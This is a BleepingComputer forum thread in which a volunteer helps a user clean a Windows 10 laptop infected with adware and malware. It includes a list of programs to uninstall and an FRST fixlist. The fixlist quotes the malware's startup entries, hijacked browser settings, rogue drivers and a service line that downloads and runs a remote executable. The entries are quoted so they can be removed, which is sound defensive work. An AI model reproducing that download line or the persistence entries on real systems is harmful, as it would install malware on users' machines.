Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Virus/Malware Attack - Random Chrome Startup, ISE, install attempts, etc


  • This topic is locked This topic is locked
9 replies to this topic

#1 billiam864

billiam864

  • Members
  • 71 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 27 December 2016 - 03:59 PM

Hi,

 

I apparently tried to download the wrong kind of software. My computer was immediate attacked. Issues noticed thusfar are Chrome won't startup/load websites, but will start at random to searching.com, wizzit, or other sites. Random installations are appearing for unknown software. Internet Security essentials is popping up to block websites. I cannot use Windows Defender as it keeping turning it off, and changing the Group Policy settings. My computer is super slow, and I couldn't even get to a website to download the Farbar Tool to create data logs (used usb flash drive to transfer).  

 

CPU details:

Lenovo Ultrabook (3 years old)

Windows 10

 

BleepingComputer helped me wonderfully in a few years ago, so I'm coming back again!

 

Logs are attached.

 

Attached Files



BC AdBot (Login to Remove)

 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,971 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:07:48 PM

Posted 27 December 2016 - 08:56 PM

Greetings billiam864 and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. Please allow me just a bit of time to review what you have posted.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,971 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:07:48 PM

Posted 27 December 2016 - 10:44 PM

Greetings.

We have a bit of work to do. If you are unable to complete the below after booting normally, please boot into Safe Mode with Networking and attempt it.

===================================================

Uninstalling Programs Using Revo Uninstaller Free

--------------------

I recommend uninstalling the below listed program(s) from your computer.

Revo Uninstaller is more thorough in deleting programs on your computer than using the Add/Remove option in Windows.  Since it is a more powerful tool, please be sure to follow the instructions carefully.

Please note there is a chance when you look for this program to uninstall through Revo it might not be listed because of a previous uninstall.  If that is the case simply stop and let me know.

  • Please download and install Revo Uninstaller Free
  • Double click the Revo Uninstaller icon
  • From the list of programs double click on the listed program(s), or anything similar, to remove it (if it exists)

AnonymizerGadget
AnySend
BandwidthStat
BestCleaner version 1.0
Body Text Feathering
CleanBrowser
EZSearch
Itibiti RTC
KNCTR
MyBeeSearchService
NowUSeeIt Player
One System Care
ProxyGate version 3.0.0.1176
REOptimizer
Search module
shopperz
Social2Search
System Healer
Unfugitive Archhypocrite Asonia
Youtube AdBlock
  • If presented with the program uninstall option click Uninstall
  • If asked to reboot select Reboot later
  • Under Scanning Modes select Advanced then select Scan
  • On the Found leftover Registry items window check the items in bold only  then click Delete.  You may have to expand some folders by clicking the "+" mark.
  • When prompted click on Next then Yes
  • On the Found leftover files and folders window click on Select all, click Finish, then click Yes

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows Key  + R on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it as fixlist.txt in the same location/folder as FRST.exe (<<<Important)

CreateRestorePoint:
CloseProcesses:
C:\Users\Robert G\AppData\Local\Temp\WS
C:\Users\Robert G\AppData\Roaming\src_srv
C:\Program Files\AE5AV44CD6
C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE
C:\Program Files (x86)\mem
C:\Program Files (x86)\BestCleaner
C:\Program Files\1OZOH9DOKF
C:\Program Files\0DA5GV0SMZ
C:\Program Files (x86)\Unfugitivepocson
C:\Program Files (x86)\Ovals
C:\Program Files (x86)\NowUSeeItPlayer
C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe
C:\Program Files\Common Files\Noobzo
C:\Program Files\Jidd
C:\Users\Robert G\AppData\Roaming\JucdiJhnoz
C:\Users\Robert G\AppData\Roaming\Xeeedxi
C:\Users\Robert G\AppData\Roaming\Interstatnogui
C:\Windows\Temp\nst9E9E.tmp
C:\Windows\Temp\set_xVQSGNGL.exe
C:\Windows\Temp\set_xVQSGNGL.exe
C:\Users\Robert G\AppData\Local\Temp\WS
C:\Program Files (x86)\Unfugitivepocson
HKLM\...\Run: [group] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKLM\...\Run: [groupgroup] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [AnonymizerGadget] => "C:\Users\Robert G\AppData\Roaming\AGData\bin$\AnonymizerLauncher.exe" /S /startup --ppapi-flash-path=./pepflashplayer.dll /source:1665 /subsource:200088693 <===== ATTENTION
C:\Users\Robert G\AppData\Roaming\AGData
HKLM-x32\...\Run: [src_srv] => C:\Users\Robert G\AppData\Roaming\src_srv\strttst.exe [16464 2016-12-26] ()
HKLM-x32\...\Run: [ayling] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [aylingayling] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [BestCleaner] => C:\Program Files (x86)\BestCleaner\BestCleaner.exe [180736 2016-09-16] () <===== ATTENTION
HKLM-x32\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] () <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_FD7I7] => C:\Program Files (x86)\BestCleaner\6URRPC.exe [411648 2016-12-27] (LFG655OZW) <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_4SCPB] => C:\Program Files (x86)\BestCleaner\RLLZNZ.exe [411648 2016-12-27] (LFG655OZW) <===== ATTENTION
HKLM\...\Policies\Explorer: [NoViewOnDrive] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKLM\...\Policies\Explorer: [NoViewContextMenu] 0
HKLM\...\Policies\Explorer: [NoShellSearchButton] 0
HKLM\...\Policies\Explorer: [NoFind] 0
HKLM\...\Policies\Explorer: [NoFile] 0
HKLM\...\Policies\Explorer: [HideClock] 0
HKLM\...\Policies\Explorer: [NoTrayContextMenu] 0
HKLM\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKLM\...\Policies\Explorer: [NoSetFolders] 0
HKLM\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKLM\...\Policies\Explorer: [NoSetTaskbar] 0
HKLM\...\Policies\Explorer: [NoDeletePrinter] 0
HKLM\...\Policies\Explorer: [NoDFSTab] 0
HKLM\...\Policies\Explorer: [NoChangeStartMenu] 0
HKLM\...\Policies\Explorer: [NoLogoff] 0
HKLM\...\Policies\Explorer: [NoWindowsUpdate] 0
HKLM\...\Policies\Explorer: [NoEncryptOnMove] 0
HKLM\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKLM\...\Policies\Explorer: [NoResolveSearch] 0
HKLM\...\Policies\Explorer: [NoSaveSettings] 0
HKLM\...\Policies\Explorer: [NoHardwareTab] 0
HKLM\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\...\Policies\Explorer: [NoDesktop] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [probabaly] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [probabalyprobabaly] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [formally] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [formallyformally] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [7E2GIGOFIW] => C:\Program Files\AE5AV44CD6\AE5AV44CD.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [kelling] => C:\Program Files (x86)\mem\kelling.exe [68835 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [const] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [ProxyGate] => C:\Users\Robert G\AppData\Roaming\ProxyGate\MainService.exe [1142880 2016-01-10] (Gold Click Ltd) <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [DP53A0YCAS] => C:\Program Files\1OZOH9DOKF\8RNAHD98E.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [slisdo] => rundll32.exe "C:\Users\Robert G\AppData\Local\slisdo.dll",slisdo <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [8SI36M2PFP] => C:\Program Files\0DA5GV0SMZ\0DA5GV0SM.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [YPCXU7XLWZ] => C:\Program Files (x86)\BestCleaner\ZES6LOELP3.exe [369152 2016-12-27] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [Q4M50GL1YU] => C:\Program Files (x86)\BestCleaner\A3TLSPE275.exe [369152 2016-12-27] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [Interstatnogui] => C:\Users\Robert G\AppData\Roaming\Interstatnogui\interstatnogui.exe [2757568 2016-12-27] (Global surveys) <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoStartMenuSubFolders] 0
Startup: C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\misprision.lnk [2016-12-27]
ShortcutTarget: misprision.lnk -> C:\Program Files (x86)\Ovals\fluctuations.exe ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ie
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> DefaultScope {CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} URL =
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> {B2155548-F7E4-4313-ACE1-89C26E550F10} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> {CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} URL =
BHO: Jidd -> {9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} -> C:\Program Files\Jidd\Rorfeql64.dll [2016-12-27] ()
BHO: No Name -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [No File]
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ch"
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shyos&prd=set_ch&q={searchTerms}&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
R2 66d2d577efd779c3e9f6f6c2faf74956; C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe [5556736 2016-12-16] () [File not signed] <==== ATTENTION
R2 Cegoe; C:\Users\Robert G\AppData\Roaming\Xeeedxi\Xeeedxi.exe [170496 2016-12-04] () [File not signed]
R2 Ilaaugca; C:\Users\Robert G\AppData\Roaming\JucdiJhnoz\Rawei.exe [121344 2016-12-04] () [File not signed]
R2 KarxMhfonki; C:\Program Files\Jidd\KarxMhfonki.exe [1684992 2016-12-27] () [File not signed]
R2 srcsrv; C:\Users\Robert G\AppData\Roaming\src_srv\winsrcsrv.exe [13904 2016-12-26] ()
R2 UnfugitiveA; C:\Program Files (x86)\Unfugitivepocson\UnfugitiveA.exe [132096 2016-12-16] (Renascence Inc.) [File not signed]
R2 WindowService; C:\Users\Robert G\AppData\Local\Temp\WS\WindowService.exe [8192 2016-12-25] () [File not signed]
S3 CHNGTSvc; c:\exervice.exe http://cloudfront.3aede491e42bccaa839f051de3c638120d682b5c.tech/download/xpack1221_US.1482324322.exe [X] <==== ATTENTION
c:\exervice.exe
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
R2 meseboje; C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\knsg851A.tmpfs [X]
R1 979804fd5c15500d838ae68596384f64; C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys [95040 2016-12-16] (97V68D) <==== ATTENTION
R1 cherimoya; C:\WINDOWS\System32\drivers\cherimoya.sys [65440 2016-12-27] (Windows ® Win 7 DDK provider) <==== ATTENTION
C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys
C:\WINDOWS\System32\drivers\cherimoya.sys
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2016-12-26] ()
2016-12-27 13:36 - 2016-12-27 13:38 - 00000000 ____D C:\Users\Robert G\AppData\Local\E5AD75FC-1482845765-9D97-579A-C454442718AE
2016-12-27 13:36 - 2016-12-27 13:38 - 00000000 ____D C:\Program Files\Jidd
2016-12-27 13:36 - 2016-12-27 13:36 - 00439808 _____ C:\ProgramData\smp2.exe
2016-12-27 13:36 - 2016-12-27 13:36 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-12-27 13:36 - 2016-12-27 13:36 - 00004424 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134
2016-12-27 13:36 - 2016-12-27 13:36 - 00004262 _____ C:\WINDOWS\System32\Tasks\SMW_P
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____H C:\WINDOWS\system32\BITBBD7.tmp
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\JucdiJhnoz
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\LocalLow\Company
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Local\Tempfolder
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Local\CrashRpt
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\uninst
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\ProgramData\SearchModule
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Program Files\JiddUn
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2016-12-27 13:21 - 2016-12-27 13:21 - 00000000 ____D C:\ProgramData\d4b1e343-7d03-0
2016-12-27 13:16 - 2016-12-27 13:16 - 00003688 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-12-27 13:16 - 2016-12-27 13:16 - 00002954 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-12-27 13:16 - 2016-12-27 13:16 - 00002660 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-12-27 13:16 - 2016-12-27 13:16 - 00001063 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
2016-12-27 13:16 - 2016-12-27 13:16 - 00000308 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-12-27 13:16 - 2016-12-27 13:16 - 00000308 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\ProgramData\d4b1e343-2e47-1
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2016-12-27 13:12 - 2016-12-27 13:12 - 08784866 _____ C:\xpack1221_US.1482324322.exe
2016-12-27 13:12 - 2016-12-27 13:12 - 00000000 ____D C:\Program Files (x86)\SoftUpgrade
2016-12-27 13:10 - 2016-12-27 13:11 - 08784866 _____ C:\WINDOWS\SysWOW64\SendRequest Error
2016-12-27 13:09 - 2016-12-27 13:54 - 00000000 ____D C:\WINDOWS\system32\SSL
2016-12-27 13:09 - 2016-12-27 13:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Socia2Sear Browser Enhancer
2016-12-27 13:09 - 2016-12-27 13:09 - 00000000 ____D C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956
2016-12-27 13:08 - 2016-12-27 13:08 - 00001150 _____ C:\Users\Public\Desktop\KNCTR.lnk
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Users\Robert G\AppData\Local\NowUSeeItPlayer
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Users\Robert G\AppData\Local\Chromium
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NowUSeeIt Player
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KNCTR
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\NowUSeeItPlayer
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\Itibiti Soft Phone
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
2016-12-27 13:07 - 2016-12-27 13:37 - 00000000 ____D C:\Users\Robert G\AppData\Local\E5AD75FC-1482844048-9D97-579A-C454442718AE
2016-12-27 13:07 - 2016-12-27 13:10 - 00100352 _____ C:\Users\Robert G\AppData\Local\slisdo.dll
2016-12-27 13:07 - 2016-12-27 13:10 - 00002560 _____ C:\Users\Robert G\AppData\Local\uninstallro.exe
2016-12-27 13:07 - 2016-12-27 13:07 - 00003074 _____ C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock2
2016-12-27 13:07 - 2016-12-27 13:07 - 00000366 _____ C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____H C:\WINDOWS\system32\BITDFC5.tmp
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\ProxyGate
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnonymizerGadget
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Program Files\1OZOH9DOKF
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Program Files\0DA5GV0SMZ
2016-12-27 13:06 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\BestCleaner
2016-12-27 13:06 - 2016-12-27 13:06 - 00002770 _____ C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock
2016-12-27 13:06 - 2016-12-27 13:06 - 00000366 _____ C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job
2016-12-27 13:06 - 2016-12-27 13:06 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-12-27 13:06 - 2016-12-27 13:06 - 00000000 ____D C:\Program Files (x86)\Youtube AdBlock
2016-12-27 13:05 - 2016-12-27 13:06 - 02194294 _____ (Stellar Information Technology Pvt Ltd. ) C:\Users\Robert G\Downloads\Unconfirmed 89628.crdownload
2016-12-27 13:05 - 2016-12-27 13:06 - 00003874 _____ C:\WINDOWS\System32\Tasks\73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003866 _____ C:\WINDOWS\System32\Tasks\k73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003860 _____ C:\WINDOWS\System32\Tasks\18170115
2016-12-27 13:05 - 2016-12-27 13:06 - 00003856 _____ C:\WINDOWS\System32\Tasks\60353394
2016-12-27 13:05 - 2016-12-27 13:06 - 00003746 _____ C:\WINDOWS\System32\Tasks\ga7369985773699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003742 _____ C:\WINDOWS\System32\Tasks\gak73699857k73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003734 _____ C:\WINDOWS\System32\Tasks\ga1817011518170115
2016-12-27 13:05 - 2016-12-27 13:06 - 00003728 _____ C:\WINDOWS\System32\Tasks\ga6035339460353394
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\Ovals
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\mem
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\Disenfranchise
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\ASPackage
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files\AE5AV44CD6
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files (x86)\knockdowns
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE
2016-12-27 13:03 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\AGData
2016-12-27 13:03 - 2016-12-27 13:03 - 00003804 _____ C:\WINDOWS\System32\Tasks\src_srv
2016-12-27 13:03 - 2016-12-27 13:03 - 00003414 _____ C:\WINDOWS\System32\Tasks\AGProxyCheck
2016-12-27 13:03 - 2016-12-27 13:03 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\src_srv
2016-12-27 13:03 - 2016-12-27 13:03 - 00000000 ____D C:\Program Files (x86)\AnonymizerGadget
2016-12-27 13:02 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\Unfugitivepocson
2016-12-27 13:02 - 2016-12-27 13:02 - 00024776 _____ C:\WINDOWS\System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B}
2016-12-27 13:02 - 2016-12-27 13:02 - 00003692 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2016-12-27 13:02 - 2016-12-27 13:02 - 00003372 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2016-12-27 13:02 - 2016-12-27 13:02 - 00001147 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\One System Care
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\1a467d37-72a5-1
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\1a467d37-42f7-0
